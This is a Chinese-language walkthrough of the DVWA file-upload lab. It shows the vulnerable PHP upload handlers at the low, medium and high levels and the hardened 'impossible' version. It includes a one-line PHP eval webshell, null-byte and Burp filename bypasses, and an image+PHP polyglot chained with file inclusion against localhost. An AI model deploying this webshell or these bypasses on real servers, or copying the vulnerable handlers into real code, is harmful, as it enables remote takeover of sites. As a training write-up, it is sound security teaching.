DVWA文件上传的安全攻击与防护
这篇文章主要针对DVWA File Upload的安全演练说明, 四种安全防护与攻击的方式, File Upload 的安全漏洞将导致黑客上传木马远程控制

低安全级别
首先我们看低安全及别的文件上传代码, 该代码存在两个问题
- 服务器对上传文件的类型、内容没有做任何的检查、过滤
- 文件生成上传路径后,服务器会检查是否上传成功并返回相应提示信息。
echo “<pre>{$target_path} succesfully uploaded!</pre>”;
<?php
if( isset( $_POST[ 'Upload' ] ) ) {
// Where are we going to be writing to?
$target_path = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/";
$target_path .= basename( $_FILES[ 'uploaded' ][ 'name' ] );
// Can we move the file to the upload folder?
if( !move_uploaded_file( $_FILES[ 'uploaded' ][ 'tmp_name' ], $target_path ) ) {
// No
echo '<pre>Your image was not uploaded.</pre>';
}
else {
// Yes!
echo "<pre>{$target_path} succesfully uploaded!</pre>";
}
}
?>
因此我们可以利用PHP一句话木马来进行测试 hacker.php
<?php
@eval($_POST['shell']);
?>
可参考这里相关木马脚本范例
https://github.com/SecWiki/WebShell-2
上传该文件 hacker.php 根据返回的路径名称我们可以根据下列URL进行攻击
http://127.0.0.1/dvwa/hackable/uploads/hacker.php
由于该hacker.php 会依据参数 shell 的内容进行指令执行, 因此可以针对该参数进行命令注入
中级防护
这个防护主要针对文件要求文件类型必须是jpeg或者png,大小不能超过100000B(约为97.6KB) , 可以配合 File Inclusion 的漏洞与文件上传的漏洞攻击
攻击方式:
http://127.0.0.1/dvwa/vulnerabilities/fi/?page=http://tp://127.0.0.1/dvwa/hackable/uploads/hack.png
用 Burp 拦截传送的 filename 修改为hack.phpl或是利用 上传文件命名为hack.php%00.png 的方式绕过 (仅适用于 php版本小于5.3.4 )

<?php
if( isset( $_POST[ 'Upload' ] ) ) {
// Where are we going to be writing to?
$target_path = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/";
$target_path .= basename( $_FILES[ 'uploaded' ][ 'name' ] );
// File information
$uploaded_name = $_FILES[ 'uploaded' ][ 'name' ];
$uploaded_type = $_FILES[ 'uploaded' ][ 'type' ];
$uploaded_size = $_FILES[ 'uploaded' ][ 'size' ];
// Is it an image?
if( ( $uploaded_type == "image/jpeg" || $uploaded_type == "image/png" ) &&
( $uploaded_size < 100000 ) ) {
// Can we move the file to the upload folder?
if( !move_uploaded_file( $_FILES[ 'uploaded' ][ 'tmp_name' ], $target_path ) ) {
// No
echo '<pre>Your image was not uploaded.</pre>';
}
else {
// Yes!
echo "<pre>{$target_path} succesfully uploaded!</pre>";
}
}
else {
// Invalid file
echo '<pre>Your image was not uploaded. We can only accept JPEG or PNG images.</pre>';
}
}
?>
高安全级别防护
这个防护手段采用 getimagesize 限制上传文件大小, 并且限制文件后缀名为jpg, jpe, png 等, 这样我们要怎样绕过呢?
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 | <?php if ( isset( $_POST [ 'Upload' ] ) ) { // Where are we going to be writing to? $target_path = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/" ; $target_path .= basename ( $_FILES [ 'uploaded' ][ 'name' ] ); // File information $uploaded_name = $_FILES [ 'uploaded' ][ 'name' ]; $uploaded_ext = substr ( $uploaded_name , strrpos ( $uploaded_name , '.' ) + 1); $uploaded_size = $_FILES [ 'uploaded' ][ 'size' ]; $uploaded_tmp = $_FILES [ 'uploaded' ][ 'tmp_name' ]; // Is it an image? if ( ( strtolower ( $uploaded_ext ) == "jpg" || strtolower ( $uploaded_ext ) == "jpeg" || strtolower ( $uploaded_ext ) == "png" ) && ( $uploaded_size < 100000 ) && getimagesize ( $uploaded_tmp ) ) { // Can we move the file to the upload folder? if ( !move_uploaded_file( $uploaded_tmp , $target_path ) ) { // No echo '<pre>Your image was not uploaded.</pre>' ; } else { // Yes! echo "<pre>{$target_path} succesfully uploaded!</pre>" ; } } else { // Invalid file echo '<pre>Your image was not uploaded. We can only accept JPEG or PNG images.</pre>' ; } } ?> |
绕过方式
主要分为下列四个步骤
1. 首先准备一个正常的 normal.jpg 与一句话木马 php.php,
2. 将这两个文件透过下列指令合并成为 hacker.jpg
copy normal.jpg/b+php.php/a hacker.jpg
3. 将hacker.jpg上传
4. 再列用下列方式攻击
http://127.0.0.1/dvwa/vulnerabilities/fi/?page=file:///C:/xampp/htdocs/dvwa/hackable/uploads/hacker.jpg
完整的防护方式
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 | <?php if ( isset( $_POST [ 'Upload' ] ) ) { // Check Anti-CSRF token checkToken( $_REQUEST [ 'user_token' ], $_SESSION [ 'session_token' ], 'index.php' ); // File information $uploaded_name = $_FILES [ 'uploaded' ][ 'name' ]; $uploaded_ext = substr ( $uploaded_name , strrpos ( $uploaded_name , '.' ) + 1); $uploaded_size = $_FILES [ 'uploaded' ][ 'size' ]; $uploaded_type = $_FILES [ 'uploaded' ][ 'type' ]; $uploaded_tmp = $_FILES [ 'uploaded' ][ 'tmp_name' ]; // Where are we going to be writing to? $target_path = DVWA_WEB_PAGE_TO_ROOT . 'hackable/uploads/' ; //$target_file = basename( $uploaded_name, '.' . $uploaded_ext ) . '-'; $target_file = md5( uniqid() . $uploaded_name ) . '.' . $uploaded_ext ; $temp_file = ( ( ini_get ( 'upload_tmp_dir' ) == '' ) ? ( sys_get_temp_dir() ) : ( ini_get ( 'upload_tmp_dir' ) ) ); $temp_file .= DIRECTORY_SEPARATOR . md5( uniqid() . $uploaded_name ) . '.' . $uploaded_ext ; // Is it an image? if ( ( strtolower ( $uploaded_ext ) == 'jpg' || strtolower ( $uploaded_ext ) == 'jpeg' || strtolower ( $uploaded_ext ) == 'png' ) && ( $uploaded_size < 100000 ) && ( $uploaded_type == 'image/jpeg' || $uploaded_type == 'image/png' ) && getimagesize ( $uploaded_tmp ) ) { // Strip any metadata, by re-encoding image (Note, using php-Imagick is recommended over php-GD) if ( $uploaded_type == 'image/jpeg' ) { $img = imagecreatefromjpeg( $uploaded_tmp ); imagejpeg( $img , $temp_file , 100); } else { $img = imagecreatefrompng( $uploaded_tmp ); imagepng( $img , $temp_file , 9); } imagedestroy( $img ); // Can we move the file to the web root from the temp folder? if ( rename( $temp_file , ( getcwd () . DIRECTORY_SEPARATOR . $target_path . $target_file ) ) ) { // Yes! echo "<pre><a href='${target_path}${target_file}'>${target_file}</a> succesfully uploaded!</pre>" ; } else { // No echo '<pre>Your image was not uploaded.</pre>' ; } // Delete any temp files if ( file_exists ( $temp_file ) ) unlink( $temp_file ); } else { // Invalid file echo '<pre>Your image was not uploaded. We can only accept JPEG or PNG images.</pre>' ; } } // Generate Anti-CSRF token generateSessionToken(); ?> |